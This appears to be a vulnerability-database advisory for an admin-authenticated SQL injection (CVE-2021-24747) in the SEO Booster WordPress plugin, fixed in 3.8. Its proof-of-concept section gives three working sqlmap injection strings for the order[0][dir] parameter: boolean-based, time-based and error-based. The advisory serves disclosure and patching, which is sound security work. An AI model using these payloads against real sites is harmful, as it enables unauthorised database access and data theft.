WordPress Plugin Vulnerabilities

SEO Booster < 3.8 - Admin+ SQL Injection

Description

The plugin allows for authenticated SQL injection via the "fn_my_ajaxified_dataloader_ajax" AJAX request as the $_REQUEST['order'][0]['dir'] parameter is not properly escaped leading to blind and error-based SQL injections.

Proof of Concept

Install SEO Booster, then click on the "Incoming Keywords" link in the Wordpress administrative interface. An ajax request called "fn_my_ajaxified_dataloader_ajax" will be generated and sent. Intercept it and modify order[0][dir] parameter to achieve different types of SQL injections.

Sqlmap vectors:

1. Type: boolean-based blind
order[0][dir]=desc,(SELECT (CASE WHEN (1081=1081) THEN 1 ELSE 1081*(SELECT 1081 FROM INFORMATION_SCHEMA.PLUGINS) END))

2. Type: time-based blind
order[0][dir]=desc PROCEDURE ANALYSE(EXTRACTVALUE(8553,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x4b686547))))),1)#

3. Type: error-based
order[0][dir]=desc,(SELECT 9426 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(9426=9426,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Affects Plugins

Plugin icon
seo-booster
Fixed in 3.8

References

CVE
CVE-2021-24747
URL
https://plugins.trac.wordpress.org/changeset/2637115

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
bl4derunner
Submitter
Anton Sarsadskikh
Verified
Yes
WPVDB ID
40849d93-8949-4bd0-b60e-c0330b385fea

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2022-03-02
Title
Limit Login Attempts (Spam Protection) < 5.1 - Unauthenticated SQLi
Published
2022-07-18
Title
Website File Changes Monitor < 1.8.3 - Admin+ SQLi
Published
2022-04-18
Title
MapSVG < 6.2.20 - Unauthenticated SQLi
Published
2023-12-07
Title
ArtPlacer Widget < 2.20.7 - Editor+ SQLi
Published
2021-11-29
Title
Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection